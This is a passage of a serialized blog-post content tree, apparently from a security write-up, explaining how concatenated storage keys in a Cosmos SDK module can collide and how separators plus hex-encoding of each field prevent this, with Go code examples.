username",{"type":24,"tag":301,"props":91964,"children":91965},{"style":359},[91966],{"type":30,"value":1729},{"type":24,"tag":301,"props":91968,"children":91969},{"class":303,"line":401},[91970,91975],{"type":24,"tag":301,"props":91971,"children":91972},{"style":369},[91973],{"type":30,"value":91974}," positionName",{"type":24,"tag":301,"props":91976,"children":91977},{"style":359},[91978],{"type":30,"value":1729},{"type":24,"tag":301,"props":91980,"children":91981},{"class":303,"line":415},[91982],{"type":24,"tag":301,"props":91983,"children":91984},{"style":359},[91985],{"type":30,"value":791},{"type":24,"tag":32,"props":91987,"children":91988},{},[91989],{"type":30,"value":91990},"Although plain concatenation allows us to easily construct a storage key, it becomes apparent that this implementation is prone to key collisions.",{"type":24,"tag":291,"props":91992,"children":91994},{"code":91993},"vaultId = 1, username = \"2a\", positionName = \"b\"\n => storageKey = \"12ab\"\n\nvaultId = 12, username = \"a\", positionName = \"b\"\n => storageKey = \"12ab\"\n",[91995],{"type":24,"tag":145,"props":91996,"children":91997},{"__ignoreMap":7},[91998],{"type":30,"value":91993},{"type":24,"tag":32,"props":92000,"children":92001},{},[92002,92007],{"type":24,"tag":5422,"props":92003,"children":92004},{},[92005],{"type":30,"value":92006},"So, how can we mitigate this issue?",{"type":30,"value":92008},"\nPerhaps we can add a field separator between each field, which would resemble the following:",{"type":24,"tag":291,"props":92010,"children":92012},{"code":92011,"language":82877,"meta":7,"className":82878,"style":7},"const (\n Seperator = \"|\"\n)\n\nstorageKey := fmt.Sprintf(\n \"%d%s%s%s%s\",\n vaultId,\n Seperator,\n username,\n Seperator,\n positionName,\n)\n",[92013],{"type":24,"tag":145,"props":92014,"children":92015},{"__ignoreMap":7},[92016,92027,92044,92051,92058,92085,92097,92108,92119,92130,92141,92152],{"type":24,"tag":301,"props":92017,"children":92018},{"class":303,"line":304},[92019,92023],{"type":24,"tag":301,"props":92020,"children":92021},{"style":348},[92022],{"type":30,"value":16460},{"type":24,"tag":301,"props":92024,"children":92025},{"style":359},[92026],{"type":30,"value":85278},{"type":24,"tag":301,"props":92028,"children":92029},{"class":303,"line":320},[92030,92035,92039],{"type":24,"tag":301,"props":92031,"children":92032},{"style":369},[92033],{"type":30,"value":92034}," Seperator",{"type":24,"tag":301,"props":92036,"children":92037},{"style":385},[92038],{"type":30,"value":2537},{"type":24,"tag":301,"props":92040,"children":92041},{"style":329},[92042],{"type":30,"value":92043}," \"|\"\n",{"type":24,"tag":301,"props":92045,"children":92046},{"class":303,"line":335},[92047],{"type":24,"tag":301,"props":92048,"children":92049},{"style":359},[92050],{"type":30,"value":791},{"type":24,"tag":301,"props":92052,"children":92053},{"class":303,"line":344},[92054],{"type":24,"tag":301,"props":92055,"children":92056},{"emptyLinePlaceholder":16},[92057],{"type":30,"value":341},{"type":24,"tag":301,"props":92059,"children":92060},{"class":303,"line":401},[92061,92065,92069,92073,92077,92081],{"type":24,"tag":301,"props":92062,"children":92063},{"style":369},[92064],{"type":30,"value":91909},{"type":24,"tag":301,"props":92066,"children":92067},{"style":385},[92068],{"type":30,"value":83129},{"type":24,"tag":301,"props":92070,"children":92071},{"style":369},[92072],{"type":30,"value":88939},{"type":24,"tag":301,"props":92074,"children":92075},{"style":359},[92076],{"type":30,"value":206},{"type":24,"tag":301,"props":92078,"children":92079},{"style":314},[92080],{"type":30,"value":91926},{"type":24,"tag":301,"props":92082,"children":92083},{"style":359},[92084],{"type":30,"value":1707},{"type":24,"tag":301,"props":92086,"children":92087},{"class":303,"line":415},[92088,92093],{"type":24,"tag":301,"props":92089,"children":92090},{"style":329},[92091],{"type":30,"value":92092}," \"%d%s%s%s%s\"",{"type":24,"tag":301,"props":92094,"children":92095},{"style":359},[92096],{"type":30,"value":1729},{"type":24,"tag":301,"props":92098,"children":92099},{"class":303,"line":439},[92100,92104],{"type":24,"tag":301,"props":92101,"children":92102},{"style":369},[92103],{"type":30,"value":91950},{"type":24,"tag":301,"props":92105,"children":92106},{"style":359},[92107],{"type":30,"value":1729},{"type":24,"tag":301,"props":92109,"children":92110},{"class":303,"line":447},[92111,92115],{"type":24,"tag":301,"props":92112,"children":92113},{"style":369},[92114],{"type":30,"value":92034},{"type":24,"tag":301,"props":92116,"children":92117},{"style":359},[92118],{"type":30,"value":1729},{"type":24,"tag":301,"props":92120,"children":92121},{"class":303,"line":476},[92122,92126],{"type":24,"tag":301,"props":92123,"children":92124},{"style":369},[92125],{"type":30,"value":91962},{"type":24,"tag":301,"props":92127,"children":92128},{"style":359},[92129],{"type":30,"value":1729},{"type":24,"tag":301,"props":92131,"children":92132},{"class":303,"line":495},[92133,92137],{"type":24,"tag":301,"props":92134,"children":92135},{"style":369},[92136],{"type":30,"value":92034},{"type":24,"tag":301,"props":92138,"children":92139},{"style":359},[92140],{"type":30,"value":1729},{"type":24,"tag":301,"props":92142,"children":92143},{"class":303,"line":504},[92144,92148],{"type":24,"tag":301,"props":92145,"children":92146},{"style":369},[92147],{"type":30,"value":91974},{"type":24,"tag":301,"props":92149,"children":92150},{"style":359},[92151],{"type":30,"value":1729},{"type":24,"tag":301,"props":92153,"children":92154},{"class":303,"line":512},[92155],{"type":24,"tag":301,"props":92156,"children":92157},{"style":359},[92158],{"type":30,"value":791},{"type":24,"tag":32,"props":92160,"children":92161},{},[92162],{"type":30,"value":92163},"Inserting a separator helps prevent most accidental collisions, but does it completely solve the problem?",{"type":24,"tag":32,"props":92165,"children":92166},{},[92167,92169,92175,92176,92182],{"type":30,"value":92168},"Sadly, it doesn't. Since the ",{"type":24,"tag":145,"props":92170,"children":92172},{"className":92171},[],[92173],{"type":30,"value":92174},"username",{"type":30,"value":2378},{"type":24,"tag":145,"props":92177,"children":92179},{"className":92178},[],[92180],{"type":30,"value":92181},"vaultName",{"type":30,"value":92183}," are both strings that may contain arbitrary characters (including the separator), collisions can still happen.",{"type":24,"tag":291,"props":92185,"children":92187},{"code":92186},"vaultId = 1, username = \"a|\", positionName = \"b\"\n => storageKey = \"1|a||b\"\n\nvaultId = 1, username = \"a\", positionName = \"|b\"\n => storageKey = \"1|a||b\"\n",[92188],{"type":24,"tag":145,"props":92189,"children":92190},{"__ignoreMap":7},[92191],{"type":30,"value":92186},{"type":24,"tag":32,"props":92193,"children":92194},{},[92195],{"type":30,"value":92196},"To further mitigate this, we could encode all fields to ensure that the separator is excluded in individual fields, thus making field injections impossible.",{"type":24,"tag":291,"props":92198,"children":92200},{"code":92199,"language":82877,"meta":7,"className":82878,"style":7},"const (\n Seperator = \"|\"\n)\n\n\nusernameEncoded := make(\n []byte,\n hex.EncodedLen(len(username)),\n)\nhex.Encode(usernameEncoded, username)\n\npositionNameEncoded := make(\n []byte,\n hex.EncodedLen(len(positionName)),\n)\nhex.Encode(positionNameEncoded, positionName)\n\nstorageKey := fmt.Sprintf(\n \"%d%s%s%s%s\",\n vaultId,\n Seperator,\n usernameEncoded,\n Seperator,\n positionNameEncoded\n)\n",[92201],{"type":24,"tag":145,"props":92202,"children":92203},{"__ignoreMap":7},[92204,92215,92230,92237,92244,92251,92272,92288,92326,92333,92370,92377,92397,92412,92448,92455,92490,92497,92524,92535,92546,92557,92569,92580,92588],{"type":24,"tag":301,"props":92205,"children":92206},{"class":303,"line":304},[92207,92211],{"type":24,"tag":301,"props":92208,"children":92209},{"style":348},[92210],{"type":30,"value":16460},{"type":24,"tag":301,"props":92212,"children":92213},{"style":359},[92214],{"type":30,"value":85278},{"type":24,"tag":301,"props":92216,"children":92217},{"class":303,"line":320},[92218,92222,92226],{"type":24,"tag":301,"props":92219,"children":92220},{"style":369},[92221],{"type":30,"value":92034},{"type":24,"tag":301,"props":92223,"children":92224},{"style":385},[92225],{"type":30,"value":2537},{"type":24,"tag":301,"props":92227,"children":92228},{"style":329},[92229],{"type":30,"value":92043},{"type":24,"tag":301,"props":92231,"children":92232},{"class":303,"line":335},[92233],{"type":24,"tag":301,"props":92234,"children":92235},{"style":359},[92236],{"type":30,"value":791},{"type":24,"tag":301,"props":92238,"children":92239},{"class":303,"line":344},[92240],{"type":24,"tag":301,"props":92241,"children":92242},{"emptyLinePlaceholder":16},[92243],{"type":30,"value":341},{"type":24,"tag":301,"props":92245,"children":92246},{"class":303,"line":401},[92247],{"type":24,"tag":301,"props":92248,"children":92249},{"emptyLinePlaceholder":16},[92250],{"type":30,"value":341},{"type":24,"tag":301,"props":92252,"children":92253},{"class":303,"line":415},[92254,92259,92263,92268],{"type":24,"tag":301,"props":92255,"children":92256},{"style":369},[92257],{"type":30,"value":92258},"usernameEncoded",{"type":24,"tag":301,"props":92260,"children":92261},{"style":385},[92262],{"type":30,"value":83129},{"type":24,"tag":301,"props":92264,"children":92265},{"style":314},[92266],{"type":30,"value":92267}," make",{"type":24,"tag":301,"props":92269,"children":92270},{"style":359},[92271],{"type":30,"value":1707},{"type":24,"tag":301,"props":92273,"children":92274},{"class":303,"line":439},[92275,92280,92284],{"type":24,"tag":301,"props":92276,"children":92277},{"style":359},[92278],{"type":30,"value":92279}," []",{"type":24,"tag":301,"props":92281,"children":92282},{"style":10246},[92283],{"type":30,"value":91469},{"type":24,"tag":301,"props":92285,"children":92286},{"style":359},[92287],{"type":30,"value":1729},{"type":24,"tag":301,"props":92289,"children":92290},{"class":303,"line":447},[92291,92296,92300,92305,92309,92313,92317,92321],{"type":24,"tag":301,"props":92292,"children":92293},{"style":369},[92294],{"type":30,"value":92295}," hex",{"type":24,"tag":301,"props":92297,"children":92298},{"style":359},[92299],{"type":30,"value":206},{"type":24,"tag":301,"props":92301,"children":92302},{"style":314},[92303],{"type":30,"value":92304},"EncodedLen",{"type":24,"tag":301,"props":92306,"children":92307},{"style":359},[92308],{"type":30,"value":362},{"type":24,"tag":301,"props":92310,"children":92311},{"style":314},[92312],{"type":30,"value":6156},{"type":24,"tag":301,"props":92314,"children":92315},{"style":359},[92316],{"type":30,"value":362},{"type":24,"tag":301,"props":92318,"children":92319},{"style":369},[92320],{"type":30,"value":92174},{"type":24,"tag":301,"props":92322,"children":92323},{"style":359},[92324],{"type":30,"value":92325},")),\n",{"type":24,"tag":301,"props":92327,"children":92328},{"class":303,"line":476},[92329],{"type":24,"tag":301,"props":92330,"children":92331},{"style":359},[92332],{"type":30,"value":791},{"type":24,"tag":301,"props":92334,"children":92335},{"class":303,"line":495},[92336,92341,92345,92350,92354,92358,92362,92366],{"type":24,"tag":301,"props":92337,"children":92338},{"style":369},[92339],{"type":30,"value":92340},"hex",{"type":24,"tag":301,"props":92342,"children":92343},{"style":359},[92344],{"type":30,"value":206},{"type":24,"tag":301,"props":92346,"children":92347},{"style":314},[92348],{"type":30,"value":92349},"Encode",{"type":24,"tag":301,"props":92351,"children":92352},{"style":359},[92353],{"type":30,"value":362},{"type":24,"tag":301,"props":92355,"children":92356},{"style":369},[92357],{"type":30,"value":92258},{"type":24,"tag":301,"props":92359,"children":92360},{"style":359},[92361],{"type":30,"value":377},{"type":24,"tag":301,"props":92363,"children":92364},{"style":369},[92365],{"type":30,"value":92174},{"type":24,"tag":301,"props":92367,"children":92368},{"style":359},[92369],{"type":30,"value":791},{"type":24,"tag":301,"props":92371,"children":92372},{"class":303,"line":504},[92373],{"type":24,"tag":301,"props":92374,"children":92375},{"emptyLinePlaceholder":16},[92376],{"type":30,"value":341},{"type":24,"tag":301,"props":92378,"children":92379},{"class":303,"line":512},[92380,92385,92389,92393],{"type":24,"tag":301,"props":92381,"children":92382},{"style":369},[92383],{"type":30,"value":92384},"positionNameEncoded",{"type":24,"tag":301,"props":92386,"children":92387},{"style":385},[92388],{"type":30,"value":83129},{"type":24,"tag":301,"props":92390,"children":92391},{"style":314},[92392],{"type":30,"value":92267},{"type":24,"tag":301,"props":92394,"children":92395},{"style":359},[92396],{"type":30,"value":1707},{"type":24,"tag":301,"props":92398,"children":92399},{"class":303,"line":592},[92400,92404,92408],{"type":24,"tag":301,"props":92401,"children":92402},{"style":359},[92403],{"type":30,"value":92279},{"type":24,"tag":301,"props":92405,"children":92406},{"style":10246},[92407],{"type":30,"value":91469},{"type":24,"tag":301,"props":92409,"children":92410},{"style":359},[92411],{"type":30,"value":1729},{"type":24,"tag":301,"props":92413,"children":92414},{"class":303,"line":619},[92415,92419,92423,92427,92431,92435,92439,92444],{"type":24,"tag":301,"props":92416,"children":92417},{"style":369},[92418],{"type":30,"value":92295},{"type":24,"tag":301,"props":92420,"children":92421},{"style":359},[92422],{"type":30,"value":206},{"type":24,"tag":301,"props":92424,"children":92425},{"style":314},[92426],{"type":30,"value":92304},{"type":24,"tag":301,"props":92428,"children":92429},{"style":359},[92430],{"type":30,"value":362},{"type":24,"tag":301,"props":92432,"children":92433},{"style":314},[92434],{"type":30,"value":6156},{"type":24,"tag":301,"props":92436,"children":92437},{"style":359},[92438],{"type":30,"value":362},{"type":24,"tag":301,"props":92440,"children":92441},{"style":369},[92442],{"type":30,"value":92443},"positionName",{"type":24,"tag":301,"props":92445,"children":92446},{"style":359},[92447],{"type":30,"value":92325},{"type":24,"tag":301,"props":92449,"children":92450},{"class":303,"line":635},[92451],{"type":24,"tag":301,"props":92452,"children":92453},{"style":359},[92454],{"type":30,"value":791},{"type":24,"tag":301,"props":92456,"children":92457},{"class":303,"line":643},[92458,92462,92466,92470,92474,92478,92482,92486],{"type":24,"tag":301,"props":92459,"children":92460},{"style":369},[92461],{"type":30,"value":92340},{"type":24,"tag":301,"props":92463,"children":92464},{"style":359},[92465],{"type":30,"value":206},{"type":24,"tag":301,"props":92467,"children":92468},{"style":314},[92469],{"type":30,"value":92349},{"type":24,"tag":301,"props":92471,"children":92472},{"style":359},[92473],{"type":30,"value":362},{"type":24,"tag":301,"props":92475,"children":92476},{"style":369},[92477],{"type":30,"value":92384},{"type":24,"tag":301,"props":92479,"children":92480},{"style":359},[92481],{"type":30,"value":377},{"type":24,"tag":301,"props":92483,"children":92484},{"style":369},[92485],{"type":30,"value":92443},{"type":24,"tag":301,"props":92487,"children":92488},{"style":359},[92489],{"type":30,"value":791},{"type":24,"tag":301,"props":92491,"children":92492},{"class":303,"line":652},[92493],{"type":24,"tag":301,"props":92494,"children":92495},{"emptyLinePlaceholder":16},[92496],{"type":30,"value":341},{"type":24,"tag":301,"props":92498,"children":92499},{"class":303,"line":666},[92500,92504,92508,92512,92516,92520],{"type":24,"tag":301,"props":92501,"children":92502},{"style":369},[92503],{"type":30,"value":91909},{"type":24,"tag":301,"props":92505,"children":92506},{"style":385},[92507],{"type":30,"value":83129},{"type":24,"tag":301,"props":92509,"children":92510},{"style":369},[92511],{"type":30,"value":88939},{"type":24,"tag":301,"props":92513,"children":92514},{"style":359},[92515],{"type":30,"value":206},{"type":24,"tag":301,"props":92517,"children":92518},{"style":314},[92519],{"type":30,"value":91926},{"type":24,"tag":301,"props":92521,"children":92522},{"style":359},[92523],{"type":30,"value":1707},{"type":24,"tag":301,"props":92525,"children":92526},{"class":303,"line":674},[92527,92531],{"type":24,"tag":301,"props":92528,"children":92529},{"style":329},[92530],{"type":30,"value":92092},{"type":24,"tag":301,"props":92532,"children":92533},{"style":359},[92534],{"type":30,"value":1729},{"type":24,"tag":301,"props":92536,"children":92537},{"class":303,"line":692},[92538,92542],{"type":24,"tag":301,"props":92539,"children":92540},{"style":369},[92541],{"type":30,"value":91950},{"type":24,"tag":301,"props":92543,"children":92544},{"style":359},[92545],{"type":30,"value":1729},{"type":24,"tag":301,"props":92547,"children":92548},{"class":303,"line":3631},[92549,92553],{"type":24,"tag":301,"props":92550,"children":92551},{"style":369},[92552],{"type":30,"value":92034},{"type":24,"tag":301,"props":92554,"children":92555},{"style":359},[92556],{"type":30,"value":1729},{"type":24,"tag":301,"props":92558,"children":92559},{"class":303,"line":3639},[92560,92565],{"type":24,"tag":301,"props":92561,"children":92562},{"style":369},[92563],{"type":30,"value":92564}," usernameEncoded",{"type":24,"tag":301,"props":92566,"children":92567},{"style":359},[92568],{"type":30,"value":1729},{"type":24,"tag":301,"props":92570,"children":92571},{"class":303,"line":3647},[92572,92576],{"type":24,"tag":301,"props":92573,"children":92574},{"style":369},[92575],{"type":30,"value":92034},{"type":24,"tag":301,"props":92577,"children":92578},{"style":359},[92579],{"type":30,"value":1729},{"type":24,"tag":301,"props":92581,"children":92582},{"class":303,"line":3685},[92583],{"type":24,"tag":301,"props":92584,"children":92585},{"style":369},[92586],{"type":30,"value":92587}," positionNameEncoded\n",{"type":24,"tag":301,"props":92589,"children":92590},{"class":303,"line":3713},[92591],{"type":24,"tag":301,"props":92592,"children":92593},{"style":359},[92594],{"type":30,"value":791},{"type":24,"tag":32,"props":92596,"children":92597},{},[92598,92600,92605],{"type":30,"value":92599},"We did it. We finally eliminated all potential ",{"type":24,"tag":145,"props":92601,"children":92603},{"className":92602},[],[92604],{"type":30,"value":91909},{"type":30,"value":92606}," collisions.",{"type":24,"tag":32,"props":92608,"children":92609},{},[92610],{"type":30,"value":92611},"Until now, our focus has primarily been on storing a single structure. We recognize that in real-world applications, we frequently encounter scenarios where multiple structures must be stored as persistent states.",{"type":24,"tag":32,"props":92613,"children":92614},{},[92615,92617,92623,92625,92630,92632,92637,92639,92644,92646,92652],{"type":30,"value":92616},"In the Cosmos framework, it is common for each ",{"type":24,"tag":145,"props":92618,"children":92620},{"className":92619},[],[92621],{"type":30,"value":92622},"Module",{"type":30,"value":92624}," to own a few ",{"type":24,"tag":145,"props":92626,"children":92628},{"className":92627},[],[92629],{"type":30,"value":91681},{"type":30,"value":92631}," and have individual ",{"type":24,"tag":145,"props":92633,"children":92635},{"className":92634},[],[92636],{"type":30,"value":86657},{"type":30,"value":92638},"s managing access to storages. It's also important to note that each ",{"type":24,"tag":145,"props":92640,"children":92642},{"className":92641},[],[92643],{"type":30,"value":91681},{"type":30,"value":92645}," should be independent from one another, alleviating developers from having to worry about key collisions between different ",{"type":24,"tag":145,"props":92647,"children":92649},{"className":92648},[],[92650],{"type":30,"value":92651},"Modules",{"type":30,"value":206},{"type":24,"tag":32,"props":92654,"children":92655},{},[92656,92658,92663],{"type":30,"value":92657},"With that being said, what if we have to maintain more than one structure within the same ",{"type":24,"tag":145,"props":92659,"children":92661},{"className":92660},[],[92662],{"type":30,"value":91681},{"type":30,"value":2003},{"type":24,"tag":32,"props":92665,"children":92666},{},[92667,92669,92675,92677,92682],{"type":30,"value":92668},"To demonstrate this scenario, we introduce the ",{"type":24,"tag":145,"props":92670,"children":92672},{"className":92671},[],[92673],{"type":30,"value":92674},"NameToAddressMap",{"type":30,"value":92676}," structure, which will be stored in the same ",{"type":24,"tag":145,"props":92678,"children":92680},{"className":92679},[],[92681],{"type":30,"value":91681},{"type":30,"value":92683}," we previously used.",{"type":24,"tag":291,"props":92685,"children":92687},{"code":92686,"language":82877,"meta":7,"className":82878,"style":7},"type VaultId uint64\ntype Username string\n\ntype PositionName string\ntype Position struct {\n data []byte\n}\ntype PositionMap :=\n map[VaultId]map[Username]map[PositionName]Position\n\ntype AddressName string\ntype Address struct {\n data []byte\n}\ntype AddressMap :=\n map[VaultId]map[Username]map[AddressName]Address\n",[92688],{"type":24,"tag":145,"props":92689,"children":92690},{"__ignoreMap":7},[92691,92706,92721,92728,92743,92762,92777,92784,92799,92854,92861,92877,92897,92912,92919,92935],{"type":24,"tag":301,"props":92692,"children":92693},{"class":303,"line":304},[92694,92698,92702],{"type":24,"tag":301,"props":92695,"children":92696},{"style":348},[92697],{"type":30,"value":7026},{"type":24,"tag":301,"props":92699,"children":92700},{"style":10246},[92701],{"type":30,"value":91727},{"type":24,"tag":301,"props":92703,"children":92704},{"style":10246},[92705],{"type":30,"value":82915},{"type":24,"tag":301,"props":92707,"children":92708},{"class":303,"line":320},[92709,92713,92717],{"type":24,"tag":301,"props":92710,"children":92711},{"style":348},[92712],{"type":30,"value":7026},{"type":24,"tag":301,"props":92714,"children":92715},{"style":10246},[92716],{"type":30,"value":91743},{"type":24,"tag":301,"props":92718,"children":92719},{"style":10246},[92720],{"type":30,"value":3015},{"type":24,"tag":301,"props":92722,"children":92723},{"class":303,"line":335},[92724],{"type":24,"tag":301,"props":92725,"children":92726},{"emptyLinePlaceholder":16},[92727],{"type":30,"value":341},{"type":24,"tag":301,"props":92729,"children":92730},{"class":303,"line":344},[92731,92735,92739],{"type":24,"tag":301,"props":92732,"children":92733},{"style":348},[92734],{"type":30,"value":7026},{"type":24,"tag":301,"props":92736,"children":92737},{"style":10246},[92738],{"type":30,"value":91759},{"type":24,"tag":301,"props":92740,"children":92741},{"style":10246},[92742],{"type":30,"value":3015},{"type":24,"tag":301,"props":92744,"children":92745},{"class":303,"line":401},[92746,92750,92754,92758],{"type":24,"tag":301,"props":92747,"children":92748},{"style":348},[92749],{"type":30,"value":7026},{"type":24,"tag":301,"props":92751,"children":92752},{"style":10246},[92753],{"type":30,"value":14241},{"type":24,"tag":301,"props":92755,"children":92756},{"style":348},[92757],{"type":30,"value":27920},{"type":24,"tag":301,"props":92759,"children":92760},{"style":359},[92761],{"type":30,"value":3035},{"type":24,"tag":301,"props":92763,"children":92764},{"class":303,"line":415},[92765,92769,92773],{"type":24,"tag":301,"props":92766,"children":92767},{"style":369},[92768],{"type":30,"value":49968},{"type":24,"tag":301,"props":92770,"children":92771},{"style":359},[92772],{"type":30,"value":82940},{"type":24,"tag":301,"props":92774,"children":92775},{"style":10246},[92776],{"type":30,"value":90933},{"type":24,"tag":301,"props":92778,"children":92779},{"class":303,"line":439},[92780],{"type":24,"tag":301,"props":92781,"children":92782},{"style":359},[92783],{"type":30,"value":698},{"type":24,"tag":301,"props":92785,"children":92786},{"class":303,"line":447},[92787,92791,92795],{"type":24,"tag":301,"props":92788,"children":92789},{"style":348},[92790],{"type":30,"value":7026},{"type":24,"tag":301,"props":92792,"children":92793},{"style":10246},[92794],{"type":30,"value":91816},{"type":24,"tag":301,"props":92796,"children":92797},{"style":385},[92798],{"type":30,"value":91821},{"type":24,"tag":301,"props":92800,"children":92801},{"class":303,"line":476},[92802,92806,92810,92814,92818,92822,92826,92830,92834,92838,92842,92846,92850],{"type":24,"tag":301,"props":92803,"children":92804},{"style":348},[92805],{"type":30,"value":91829},{"type":24,"tag":301,"props":92807,"children":92808},{"style":359},[92809],{"type":30,"value":541},{"type":24,"tag":301,"props":92811,"children":92812},{"style":10246},[92813],{"type":30,"value":91838},{"type":24,"tag":301,"props":92815,"children":92816},{"style":359},[92817],{"type":30,"value":22200},{"type":24,"tag":301,"props":92819,"children":92820},{"style":348},[92821],{"type":30,"value":73814},{"type":24,"tag":301,"props":92823,"children":92824},{"style":359},[92825],{"type":30,"value":541},{"type":24,"tag":301,"props":92827,"children":92828},{"style":10246},[92829],{"type":30,"value":91855},{"type":24,"tag":301,"props":92831,"children":92832},{"style":359},[92833],{"type":30,"value":22200},{"type":24,"tag":301,"props":92835,"children":92836},{"style":348},[92837],{"type":30,"value":73814},{"type":24,"tag":301,"props":92839,"children":92840},{"style":359},[92841],{"type":30,"value":541},{"type":24,"tag":301,"props":92843,"children":92844},{"style":10246},[92845],{"type":30,"value":91872},{"type":24,"tag":301,"props":92847,"children":92848},{"style":359},[92849],{"type":30,"value":22200},{"type":24,"tag":301,"props":92851,"children":92852},{"style":10246},[92853],{"type":30,"value":91881},{"type":24,"tag":301,"props":92855,"children":92856},{"class":303,"line":495},[92857],{"type":24,"tag":301,"props":92858,"children":92859},{"emptyLinePlaceholder":16},[92860],{"type":30,"value":341},{"type":24,"tag":301,"props":92862,"children":92863},{"class":303,"line":504},[92864,92868,92873],{"type":24,"tag":301,"props":92865,"children":92866},{"style":348},[92867],{"type":30,"value":7026},{"type":24,"tag":301,"props":92869,"children":92870},{"style":10246},[92871],{"type":30,"value":92872}," AddressName",{"type":24,"tag":301,"props":92874,"children":92875},{"style":10246},[92876],{"type":30,"value":3015},{"type":24,"tag":301,"props":92878,"children":92879},{"class":303,"line":512},[92880,92884,92889,92893],{"type":24,"tag":301,"props":92881,"children":92882},{"style":348},[92883],{"type":30,"value":7026},{"type":24,"tag":301,"props":92885,"children":92886},{"style":10246},[92887],{"type":30,"value":92888}," Address",{"type":24,"tag":301,"props":92890,"children":92891},{"style":348},[92892],{"type":30,"value":27920},{"type":24,"tag":301,"props":92894,"children":92895},{"style":359},[92896],{"type":30,"value":3035},{"type":24,"tag":301,"props":92898,"children":92899},{"class":303,"line":592},[92900,92904,92908],{"type":24,"tag":301,"props":92901,"children":92902},{"style":369},[92903],{"type":30,"value":21895},{"type":24,"tag":301,"props":92905,"children":92906},{"style":359},[92907],{"type":30,"value":82940},{"type":24,"tag":301,"props":92909,"children":92910},{"style":10246},[92911],{"type":30,"value":90933},{"type":24,"tag":301,"props":92913,"children":92914},{"class":303,"line":619},[92915],{"type":24,"tag":301,"props":92916,"children":92917},{"style":359},[92918],{"type":30,"value":698},{"type":24,"tag":301,"props":92920,"children":92921},{"class":303,"line":635},[92922,92926,92931],{"type":24,"tag":301,"props":92923,"children":92924},{"style":348},[92925],{"type":30,"value":7026},{"type":24,"tag":301,"props":92927,"children":92928},{"style":10246},[92929],{"type":30,"value":92930}," AddressMap",{"type":24,"tag":301,"props":92932,"children":92933},{"style":385},[92934],{"type":30,"value":91821},{"type":24,"tag":301,"props":92936,"children":92937},{"class":303,"line":643},[92938,92942,92946,92950,92954,92958,92962,92966,92970,92974,92978,92983,92987],{"type":24,"tag":301,"props":92939,"children":92940},{"style":348},[92941],{"type":30,"value":91829},{"type":24,"tag":301,"props":92943,"children":92944},{"style":359},[92945],{"type":30,"value":541},{"type":24,"tag":301,"props":92947,"children":92948},{"style":10246},[92949],{"type":30,"value":91838},{"type":24,"tag":301,"props":92951,"children":92952},{"style":359},[92953],{"type":30,"value":22200},{"type":24,"tag":301,"props":92955,"children":92956},{"style":348},[92957],{"type":30,"value":73814},{"type":24,"tag":301,"props":92959,"children":92960},{"style":359},[92961],{"type":30,"value":541},{"type":24,"tag":301,"props":92963,"children":92964},{"style":10246},[92965],{"type":30,"value":91855},{"type":24,"tag":301,"props":92967,"children":92968},{"style":359},[92969],{"type":30,"value":22200},{"type":24,"tag":301,"props":92971,"children":92972},{"style":348},[92973],{"type":30,"value":73814},{"type":24,"tag":301,"props":92975,"children":92976},{"style":359},[92977],{"type":30,"value":541},{"type":24,"tag":301,"props":92979,"children":92980},{"style":10246},[92981],{"type":30,"value":92982},"AddressName",{"type":24,"tag":301,"props":92984,"children":92985},{"style":359},[92986],{"type":30,"value":22200},{"type":24,"tag":301,"props":92988,"children":92989},{"style":10246},[92990],{"type":30,"value":92991},"Address\n",{"type":24,"tag":32,"props":92993,"children":92994},{},[92995],{"type":30,"value":92996},"Referencing previous examples, it is necessary to sanitize/encode each key field and add seperators between fields to prevent key collisions. By putting these measures into practice, we present the following implementation below:",{"type":24,"tag":291,"props":92998,"children":93000},{"code":92999,"language":82877,"meta":7,"className":82878,"style":7},"const (\n Seperator = \"|\"\n)\n\n\nfunc PositionMapKey(\n vaultId uint64,\n username, positionName []byte,\n) (key []byte) {\n usernameEncoded := make(\n []byte,\n hex.EncodedLen(len(username)),\n )\n hex.Encode(usernameEncoded, username)\n\n positionNameEncoded := make(\n []byte,\n hex.EncodedLen(len(positionName)),\n )\n hex.Encode(positionNameEncoded, positionName)\n\n key := fmt.Sprintf(\n \"%d%s%s%s%s\",\n vaultId,\n Seperator,\n usernameEncoded,\n Seperator,\n positionNameEncoded,\n )\n}\n\n\nfunc AddressMapKey(\n vaultId uint64,\n username, addressName []byte\n) (key []byte) {\n usernameEncoded := make(\n []byte,\n hex.EncodedLen(len(username)),\n )\n hex.Encode(usernameEncoded, username)\n\n addressNameEncoded := make(\n []byte,\n hex.EncodedLen(len(addressName)),\n )\n hex.Encode(addressNameEncoded, addressName)\n\n key := fmt.Sprintf(\n \"%d%s%s%s%s\",\n vaultId,\n Seperator,\n usernameEncoded,\n Seperator,\n addressNameEncoded,\n )\n}\n",[93001],{"type":24,"tag":145,"props":93002,"children":93003},{"__ignoreMap":7},[93004,93015,93030,93037,93044,93051,93067,93082,93109,93132,93151,93167,93203,93210,93245,93252,93272,93287,93322,93329,93364,93371,93399,93411,93423,93435,93447,93458,93470,93477,93484,93491,93498,93514,93529,93553,93576,93595,93610,93645,93652,93687,93694,93714,93729,93764,93771,93807,93814,93841,93852,93863,93874,93885,93896,93908,93915],{"type":24,"tag":301,"props":93005,"children":93006},{"class":303,"line":304},[93007,93011],{"type":24,"tag":301,"props":93008,"children":93009},{"style":348},[93010],{"type":30,"value":16460},{"type":24,"tag":301,"props":93012,"children":93013},{"style":359},[93014],{"type":30,"value":85278},{"type":24,"tag":301,"props":93016,"children":93017},{"class":303,"line":320},[93018,93022,93026],{"type":24,"tag":301,"props":93019,"children":93020},{"style":369},[93021],{"type":30,"value":92034},{"type":24,"tag":301,"props":93023,"children":93024},{"style":385},[93025],{"type":30,"value":2537},{"type":24,"tag":301,"props":93027,"children":93028},{"style":329},[93029],{"type":30,"value":92043},{"type":24,"tag":301,"props":93031,"children":93032},{"class":303,"line":335},[93033],{"type":24,"tag":301,"props":93034,"children":93035},{"style":359},[93036],{"type":30,"value":791},{"type":24,"tag":301,"props":93038,"children":93039},{"class":303,"line":344},[93040],{"type":24,"tag":301,"props":93041,"children":93042},{"emptyLinePlaceholder":16},[93043],{"type":30,"value":341},{"type":24,"tag":301,"props":93045,"children":93046},{"class":303,"line":401},[93047],{"type":24,"tag":301,"props":93048,"children":93049},{"emptyLinePlaceholder":16},[93050],{"type":30,"value":341},{"type":24,"tag":301,"props":93052,"children":93053},{"class":303,"line":415},[93054,93058,93063],{"type":24,"tag":301,"props":93055,"children":93056},{"style":348},[93057],{"type":30,"value":83013},{"type":24,"tag":301,"props":93059,"children":93060},{"style":314},[93061],{"type":30,"value":93062}," 